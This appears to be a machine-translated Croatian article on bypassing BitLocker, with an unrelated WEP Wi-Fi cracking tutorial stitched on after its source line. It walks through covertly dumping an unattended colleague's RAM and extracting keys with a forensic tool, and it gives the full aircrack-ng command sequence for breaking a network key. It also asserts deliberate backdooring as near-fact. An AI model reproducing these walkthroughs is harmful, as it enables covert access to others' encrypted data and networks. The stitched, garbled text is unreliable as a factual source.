Ovo općenito ponašanje BitLockera nastavilo se u sljedećim izdanjima sustava Windows sve do danas. Međutim, BitLockerov način generiranja ključeva i načini šifriranja su se promijenili. Tako je u listopadu 2014. Microsoft tiho uklonio dodatni algoritam Elephant Diffuser, ostavljajući samo AES-CBC shemu s poznatim nedostacima. Isprva o tome nije bilo službenih izjava. Ljudi su jednostavno dobili oslabljenu tehnologiju šifriranja s istim imenom pod krinkom ažuriranja. Nejasna objašnjenja za ovaj potez uslijedila su nakon što su pojednostavljenja u BitLockeru primijetili nezavisni istraživači.

Formalno, uklanjanje Elephant Diffuser-a bilo je potrebno kako bi se osiguralo da Windows bude u skladu s američkim federalnim standardima za obradu informacija (FIPS), ali jedan argument pobija ovu verziju: Vista i Windows 7, koji su koristili Elephant Diffuser, prodavani su bez problema u Americi.

Drugi zamišljeni razlog odbijanja dodatnog algoritma je nedostatak hardverskog ubrzanja za Elephant Diffuser i gubitak brzine prilikom korištenja. No, prijašnjih godina, kada su procesori bili sporiji, iz nekog razloga im je odgovarala brzina enkripcije. A isti se AES naširoko koristio i prije nego što su postojali zasebni skupovi instrukcija i specijalizirani čipovi za njegovo ubrzanje. S vremenom je bilo moguće napraviti hardversko ubrzanje i za Elephant Diffuser, ili barem dati kupcima izbor između brzine i sigurnosti.

Druga, neslužbena verzija izgleda realnije. “Slon” je stao na put zaposlenicima koji su htjeli uložiti manje truda u dešifriranje sljedećeg diska, a Microsoft rado stupa u interakciju s nadležnim tijelima čak i u slučajevima kada njihovi zahtjevi nisu posve legalni. Neizravno potvrđuje teoriju zavjere i činjenicu da se prije Windowsa 8 pri kreiranju ključeva za šifriranje u BitLockeru koristio generator pseudoslučajnih brojeva ugrađen u Windows. U mnogim (ako ne i svim) izdanjima Windowsa, ovo je bio Dual_EC_DRBG - "kriptografski jaki PRNG" koji je razvila Američka agencija za nacionalnu sigurnost i koji sadrži niz inherentnih ranjivosti.

Naravno, tajno slabljenje ugrađene enkripcije izazvalo je snažan val kritika. Pod njezinim pritiskom, Microsoft je ponovno napisao BitLocker, zamijenivši PRNG sa CTR_DRBG u novim izdanjima Windowsa. Osim toga, u sustavu Windows 10 (počevši od verzije 1511), zadana shema enkripcije je AES-XTS, koja je imuna na manipulaciju blokovima šifriranog teksta. U najnovijim verzijama "desetke" ispravljeni su drugi poznati nedostaci BitLockera, ali glavni problem je i dalje ostao. To je toliko apsurdno da obesmišljava druge inovacije. Riječ je o principima upravljanja ključem.

Zadatak dešifriranja BitLocker pogona također je olakšan činjenicom da Microsoft aktivno promiče alternativni način vraćanja pristupa podacima putem Data Recovery Agenta. Značenje "Agenta" je da šifrira ključeve za šifriranje svih pogona unutar poslovne mreže s jednim pristupnim ključem. Nakon što ga imate, možete dešifrirati bilo koji ključ, a time i svaki disk koji koristi ista tvrtka. Zgodno? Da, posebno za hakiranje.

Ideja korištenja jednog ključa za sve brave već je bila kompromitirana mnogo puta, ali se i dalje vraća u ovom ili onom obliku radi praktičnosti. Evo kako je Ralph Leighton zabilježio memoare Richarda Feynmana o jednoj karakterističnoj epizodi njegova rada na projektu Manhattan u laboratoriju u Los Alamosu: “... Otvorio sam tri sefa – i sva tri jednom kombinacijom. Sve sam ih napravio: otvorio sam sefove sa svim tajnama atomske bombe – tehnologijom dobivanja plutonija, opisom procesa pročišćavanja, informacijama o tome koliko je materijala potrebno, kako bomba radi, kako se prave neutroni, kako bomba je posložena, koje su joj dimenzije - ukratko, sve, što su znali u Los Alamosu, cijela kuhinja!

BitLocker donekle podsjeća na siguran uređaj opisan u drugom fragmentu knjige "Naravno da se šalite, gospodine Feynman!". Najimpozantniji sef u strogo povjerljivom laboratoriju imao je istu ranjivost kao i jednostavan ormarić za spise. “... Bio je to pukovnik, a imao je mnogo lukaviji sef s dvoja vrata s velikim ručkama koje su izvlačile četiri čelične šipke debljine tri četvrtine inča iz okvira. Pogledao sam stražnju stranu jednih od impozantnih brončanih vrata i otkrio da je digitalni brojčanik povezan s malim lokotom koji je izgledao točno kao brava na mom ormaru u Los Alamosu. Bilo je očito da sustav poluga ovisi o istoj maloj šipki koja je zaključavala ormariće za spise.. Prikazujući neku vrstu aktivnosti, počeo sam nasumce okretati brojčanik. Dvije minute kasnije - klik! - Sef je otvoren. Kada su vrata sefa ili gornja ladica ormarića za spise otvorena, vrlo je lako pronaći kombinaciju. To sam i učinio kada ste pročitali moje izvješće, samo da vam pokažem opasnost."

BitLocker kripto kontejneri su sami po sebi prilično sigurni. Ako vam netko donese flash pogon koji dolazi niotkuda, kriptiran s BitLocker To Go, tada ga vjerojatno nećete dešifrirati u razumnom roku. Međutim, u stvarnom scenariju koji koristi šifrirane pogone i izmjenjive medije, postoje mnoge ranjivosti koje je lako koristiti za zaobići BitLocker.

BitLocker ranjivosti

Sigurno ste primijetili da kada prvi put aktivirate Bitlocker, morate dugo čekati. To ne čudi – proces enkripcije sektor-po-sektor može potrajati nekoliko sati, jer čak nije moguće brže čitati sve blokove terabajtnih HDD-ova. Međutim, onemogućavanje BitLockera događa se gotovo trenutno - kako to?

Činjenica je da kada je onemogućen, Bitlocker ne dešifrira podatke. Svi sektori će ostati šifrirani s FVEK ključem. Jednostavno, pristup ovom ključu više neće biti ni na koji način ograničen. Sve provjere će biti onemogućene, a VMK će ostati zabilježen među metapodacima jasnog teksta. Svaki put kada uključite računalo, OS loader će pročitati VMK (već bez provjere TPM-a, traženja ključa na flash pogonu ili lozinke), automatski dešifrirajući FVEK s njim, a zatim sve datoteke kako im se pristupa. Za korisnika će sve izgledati kao potpuni nedostatak enkripcije, ali oni najpažljiviji mogu primijetiti blagi pad performansi diskovnog podsustava. Točnije - nedostatak povećanja brzine nakon onemogućavanja enkripcije.

Ima još nešto zanimljivo u ovoj shemi. Unatoč nazivu (tehnologija potpune enkripcije diska), neki podaci pri korištenju BitLockera i dalje ostaju nešifrirani. MBR i BS ostaju u otvorenom obliku (osim ako je disk inicijaliziran u GPT), loši sektori i metapodaci. Otvoreni bootloader daje prostora za maštu. U pseudo-lošim sektorima prikladno je sakriti drugi zlonamjerni softver, a metapodaci sadrže puno zanimljivih stvari, uključujući kopije ključeva. Ako je Bitlocker aktivan, oni će biti šifrirani (ali slabiji od FVEK-a šifrira sadržaj sektora), a ako je deaktiviran, jednostavno će ležati u čistom stanju. Sve su to potencijalni vektori napada. Potencijalni su jer, osim njih, postoje puno jednostavniji i univerzalniji.

Bitlocker ključ za oporavak

Uz FVEK, VMK i SRK, BitLocker koristi drugu vrstu ključa koji se generira "za svaki slučaj". Ovo su ključevi za oporavak s kojima je povezan još jedan popularni vektor napada. Korisnici se boje zaboraviti svoju lozinku i izgubiti pristup sustavu, a sam Windows preporučuje da izvrše hitnu prijavu. Da biste to učinili, čarobnjak za šifriranje BitLocker u zadnjem koraku traži od vas da stvorite ključ za oporavak. Nije predviđeno odbijanje njegovog stvaranja. Možete odabrati samo jednu od ključnih opcija izvoza, od kojih je svaka vrlo ranjiva.

U zadanim postavkama, ključ se izvozi kao jednostavna tekstualna datoteka s prepoznatljivim nazivom: "BitLocker recovery key #", gdje je ID računala upisan umjesto # (da, točno u nazivu datoteke!). Sam ključ izgleda ovako.

Ako ste zaboravili (ili nikada niste znali) lozinku postavljenu u BitLockeru, samo potražite datoteku s ključem za oporavak. Sigurno će biti spremljen među dokumentima trenutnog korisnika ili na njegovom flash disku. Možda je čak i otisnut na komad papira, kao što Microsoft preporučuje.

Za brzo pronalaženje ključa za oporavak, prikladno je ograničiti pretragu prema ekstenziji (txt), datumu stvaranja (ako otprilike znate kada je BitLocker mogao biti omogućen) i veličini datoteke (1388 bajtova ako datoteka nije uređena) . Nakon što pronađete ključ za oporavak, kopirajte ga. Uz to možete zaobići standardnu ​​autorizaciju u BitLockeru u bilo kojem trenutku. Da biste to učinili, samo pritisnite Esc i unesite ključ za oporavak. Prijavit ćete se bez problema i čak ćete moći promijeniti lozinku u BitLockeru u proizvoljnu bez navođenja stare!

Otvaranje BitLockera

Stvaran kriptografski sustav je kompromis između praktičnosti, brzine i pouzdanosti. Trebao bi uključivati ​​postupke za transparentno šifriranje s dešifriranjem u hodu, metode za oporavak zaboravljenih lozinki i praktičan rad s ključevima. Sve to slabi svaki sustav, bez obzira na to na koliko se jakim algoritmima temelji. Stoga nije potrebno tražiti ranjivosti direktno u Rijndael algoritmu ili u različitim shemama AES standarda. Mnogo ih je lakše pronaći u specifičnostima određene implementacije.

U slučaju Microsofta ova „specifičnost“ je dovoljna. Na primjer, kopije BitLocker ključeva se prema zadanim postavkama šalju na SkyDrive i polažu u Active Directory.

Pa, što ako ih izgubite... ili pita agent Smith. Nezgodno je tjerati klijenta da čeka, a još više agenta. Iz tog razloga, usporedba kriptografska snaga AES-XTS i AES-CBC sa Elephant Diffuser nestaju u pozadini, kao i preporuke za povećanje duljine ključa. Bez obzira koliko je duga, napadač će je lako ući nešifrirano oblik .

Dohvaćanje deponiranih ključeva s Microsoftovog ili AD računa glavni je način razbijanja BitLockera. Ako korisnik nije registrirao račun u Microsoft oblaku, a njegovo računalo nije u domeni, i dalje će postojati načini za izdvajanje ključeva za šifriranje. Tijekom normalnog rada, njihove otvorene kopije uvijek su pohranjene u RAM-u (inače ne bi bilo "transparentne enkripcije"). To znači da su dostupni u njezinoj datoteci za ispis i hibernaciju.

Zašto se uopće drže tamo?

Kao što je smiješno - za praktičnost osmijeh. BitLocker je dizajniran samo za zaštitu od izvanmrežnih napada. Oni su uvijek popraćeni ponovnim pokretanjem i spajanjem diska na drugi OS, što dovodi do brisanja RAM-a. Međutim, u zadanim postavkama, OS izbacuje RAM kada dođe do kvara (koji se može isprovocirati) i zapisuje sav njegov sadržaj u datoteku hibernacije svaki put kada računalo prijeđe u duboko spavanje. Dakle, ako ste se nedavno prijavili na Windows s omogućenim BitLockerom, postoji velika šansa da ćete dobiti dešifriranu kopiju VMK-a i koristiti je za dešifriranje FVEK-a, a zatim i samih podataka niz lanac.

Provjerimo? Sve gore opisane metode hakiranja BitLockera skupljene su u jednom programu - Forensic Disk Decryptor, koji je razvila domaća tvrtka Elcomsoft. Može automatski izdvojiti ključeve za šifriranje i montirati šifrirane volumene kao virtualne pogone, dešifrirajući ih u hodu.

Dodatno, EFDD implementira još jedan netrivijalan način dobivanja ključeva - napadom preko FireWire porta, što je preporučljivo koristiti u slučaju kada nije moguće pokrenuti vaš softver na napadnutom računalu. Sam program EFDD uvijek instaliramo na svoje računalo, a na hakiranom pokušavamo upravljati s minimalnim potrebnim radnjama.

Na primjer, pokrenimo testni sustav s aktivnim BitLockerom i "nevidljivo" napravimo dump memorije. Tako ćemo simulirati situaciju u kojoj je kolega izašao na ručak, a nije zaključao računalo. Pokrećemo RAM Capture i za manje od minute dobivamo potpuni dump u datoteci s ekstenzijom .mem i veličinom koja odgovara količini RAM-a instalirane na računalu žrtve.

Nego napraviti dump - uglavnom bez razlike. Bez obzira na ekstenziju, ispostavit će se da je ovo binarna datoteka, koju će EFDD automatski analizirati u potrazi za ključevima.

Dump zapisujemo na USB flash pogon ili ga prenosimo preko mreže, nakon čega sjednemo za svoje računalo i pokrećemo EFDD.

Odaberite opciju "Extract keys" i unesite put do datoteke s izpisom memorije kao izvorom ključeva.

BitLocker je tipičan kripto kontejner, kao što je PGP Disk ili TrueCrypt. Pokazalo se da su ti spremnici sami po sebi prilično pouzdani, ali klijentske aplikacije za rad s njima pod Windows ključevima za šifriranje smeća u RAM-u. Stoga je u EFDD implementiran univerzalni scenarij napada. Program trenutno traži ključeve za šifriranje iz sve tri vrste popularnih kripto kontejnera. Stoga možete ostaviti sve stavke označene - što ako žrtva potajno koristi ili PGP!

Nakon nekoliko sekundi Elcomsoft Forensic Disk Decryptor prikazuje sve pronađene ključeve u svom prozoru. Radi praktičnosti, mogu se spremiti u datoteku - to će vam dobro doći u budućnosti.

Sada BitLocker više nije prepreka! Možete izvesti klasični offline napad – na primjer, izvaditi tvrdi disk i kopirati njegov sadržaj. Da biste to učinili, jednostavno ga spojite na svoje računalo i pokrenite EFDD u načinu "dešifriranje ili montiranje diska".

Nakon što odredite put do datoteka sa spremljenim ključevima, EFDD po ​​vašem izboru izvršit će potpunu dešifriranje volumena ili će ga odmah otvoriti kao virtualni disk. U potonjem slučaju, datoteke se dešifriraju kako im se pristupa. U svakom slučaju, izvorni volumen se ne mijenja, tako da ga možete vratiti sljedeći dan kao da se ništa nije dogodilo. Rad s EFDD-om odvija se bez traga i samo s kopijama podataka, te stoga ostaje nevidljiv.

BitLocker To Go

Počevši od "sedam" u sustavu Windows, postalo je moguće šifrirati flash pogone, USB-HDD i druge vanjske medije. Tehnologija pod nazivom BitLocker To Go šifrira prijenosne diskove na isti način kao i lokalne diskove. Šifriranje je omogućeno odgovarajućom stavkom u kontekstnom izborniku Explorera.

Za nove pogone možete koristiti šifriranje samo zauzetog područja - svejedno, slobodni prostor particije je pun nula i tu se nema što skrivati. Ako je pogon već korišten, preporuča se omogućiti potpunu enkripciju na njemu. Inače, lokacija označena kao slobodna ostat će nešifrirana. Može sadržavati u običnom tekstu nedavno izbrisane datoteke koje još nisu prepisane.

Čak i brza enkripcija samo prometnog područja traje od nekoliko minuta do nekoliko sati. Ovo vrijeme ovisi o količini podataka, propusnosti sučelja, karakteristikama pogona i brzini kriptografskih izračuna procesora. Budući da je šifriranje popraćeno kompresijom, slobodni prostor na šifriranom disku obično se neznatno povećava.

Sljedeći put kada povežete šifrirani flash pogon na bilo koje računalo sa sustavom Windows 7 ili novijim, čarobnjak za BitLocker će se automatski pokrenuti za otključavanje pogona. U Exploreru, prije otključavanja, bit će prikazan kao zaključani disk.

Ovdje možete koristiti i zaobilazna rješenja BitLockera o kojima smo već raspravljali (na primjer, traženje ključa VMK u datoteci za ispis memorije ili hibernacije) i nova koja se odnose na ključeve za oporavak.

Ako ne znate lozinku, ali ste uspjeli pronaći jedan od ključeva (ručno ili pomoću EFDD), tada postoje dvije glavne opcije za pristup šifriranom flash pogonu:

  • koristite ugrađeni BitLocker čarobnjak za izravan rad s flash pogonom;
  • koristite EFDD za potpuno dešifriranje flash pogona i stvaranje njegove slike sektor po sektor.

Prva opcija omogućuje vam da odmah pristupite datotekama snimljenim na flash pogonu, kopirate ih ili promijenite, a također i snimite svoje. Druga opcija traje mnogo dulje (od pola sata), ali ima svoje prednosti. Dešifrirana slika sektor po sektor omogućuje vam daljnje izvođenje suptilnije analize datotečnog sustava na razini forenzičkog laboratorija. U tom slučaju, sam flash pogon više nije potreban i može se vratiti nepromijenjen.

Dobivena slika može se odmah otvoriti u bilo kojem programu koji podržava IMA format ili prvo pretvoriti u drugi format (na primjer, pomoću UltraISO).

Naravno, osim pronalaženja ključa za oporavak za BitLocker2Go, u EFDD-u su podržane sve druge metode zaobilaženja BitLockera. Samo ponavljajte sve dostupne opcije zaredom dok ne pronađete ključ bilo koje vrste. Ostatak (do FVEK-a) će se sami dešifrirati duž lanca, a vi ćete dobiti potpuni pristup disku.

Zaključak

BitLocker tehnologija potpunog šifriranja diska razlikuje se između verzija sustava Windows. Nakon što je ispravno konfiguriran, omogućuje vam stvaranje kripto kontejnera koji su teoretski usporedivi po snazi ​​s TrueCryptom ili PGP-om. Međutim, ugrađeni mehanizam za rad s ključevima u sustavu Windows negira sve algoritamske trikove. Konkretno, ključ VMK koji se koristi za dešifriranje glavnog ključa u BitLockeru obnavlja se pomoću EFDD-a u nekoliko sekundi iz deponiranog duplikata, izvoda memorije, datoteke hibernacije ili napada na FireWire port.

Nakon što dobijete ključ, možete izvesti klasični offline napad, tajno kopirajući i automatski dešifrirajući sve podatke na "zaštićenom" disku. Stoga bi se BitLocker trebao koristiti samo u kombinaciji s drugim zaštitama: sustav šifriranja datoteka (EFS), usluge upravljanja pravima (RMS), kontrola pokretanja programa, kontrola instalacije uređaja i povezivanja te strožija lokalna pravila i opće sigurnosne mjere.

U članku su korišteni materijali stranice:

Kako hakirati wifi? Mnogi od nas su čuli da prilikom postavljanja Wi-Fi pristupne točke nikada ne biste trebali odabrati WEP enkripciju, jer je vrlo lako razbiti. Vjerojatno su samo rijetki pokušali to učiniti sami, a otprilike isto toliko zna kako sve to zapravo izgleda. Ispod je varijanta hakiranja točke s takvim protokolom enkripcije, kako biste jasnije shvatili koliko je stvarna situacija kada se netko spoji na vašu super tajnu točku, te o čemu se radi u takvom hakiranju. Naravno, to nikako nije moguće koristiti na tuđem usmjerivaču. Ovaj materijal je samo u informativne svrhe i poziva na napuštanje protokola za šifriranje koji se lako razbijaju.

Za hakiranje, napadač će trebati:

  • odgovarajući Wi-Fi adapter s mogućnošću ubrizgavanja paketa (npr. Alfa AWUS036H)
  • BackTrack Live CD
  • zapravo, vaša Wi-Fi pristupna točka s WEP enkripcijom, na kojoj će se postaviti eksperiment
  • strpljenje

Nakon pokretanja naredbenog retka BackTrack pod nazivom Konsole, trebate unijeti sljedeću naredbu:

Vidjet ćete svoje mrežno sučelje pod nazivom "ra0" ili nešto slično. Zapamtite ovo ime. U budućnosti će se nazivati ​​(sučelje), a vi ga zamijenite svojim imenom. Zatim unesite 4 reda u nizu:

airmon-ng stop (sučelje)
ifconfig (sučelje) dolje
macchanger --mac 00:11:22:33:44:55 (sučelje)
airmon-ng početak (sučelje)

Sada imamo lažnu MAC adresu. Unesi:

airodump-ng (sučelje)

Počet će se pojavljivati ​​popis dostupnih bežičnih mreža. Čim se željena mreža pojavi na popisu, možete pritisnuti Ctrl + C za zaustavljanje pretraživanja. Morate kopirati BSSID mreže i zapamtiti kanal (stupac CH). Također provjerite je li WEP naveden u stupcu ENC.

Sada počinjemo prikupljati informacije iz ove mreže:

airodump-ng -c (kanal) -w (naziv datoteke) --bssid (bssid) (sučelje)

kanal je kanal iz stupca CH, naziv datoteke je naziv datoteke u koju će sve biti upisano, a bssid je mrežni identifikator.

Vidjet ćete nešto slično onome što je prikazano na snimci zaslona. Ostavite ovaj prozor kakav jest. Otvorite novi prozor Konsole i upišite:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (sučelje)

essid - SSID naziv mreže žrtve.

Čekamo poruku "Udruga uspjela".

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (sučelje)

Sada morate pokazati sve svoje strpljenje i pričekati dok broj u stupcu #Data ne prijeđe oznaku 10000.

Kada se dosegne potrebna količina prikupljenih podataka, otvorite treći prozor Konsole i unesite:

aircrack-ng -b (bssid) (naziv datoteke-01.cap)

Kao naziv upisuje se naziv koji ste ranije odabrali za datoteku.

Ako je uspješno, vidjet ćete redak "KEY FOUND", koji sadrži ključ mreže.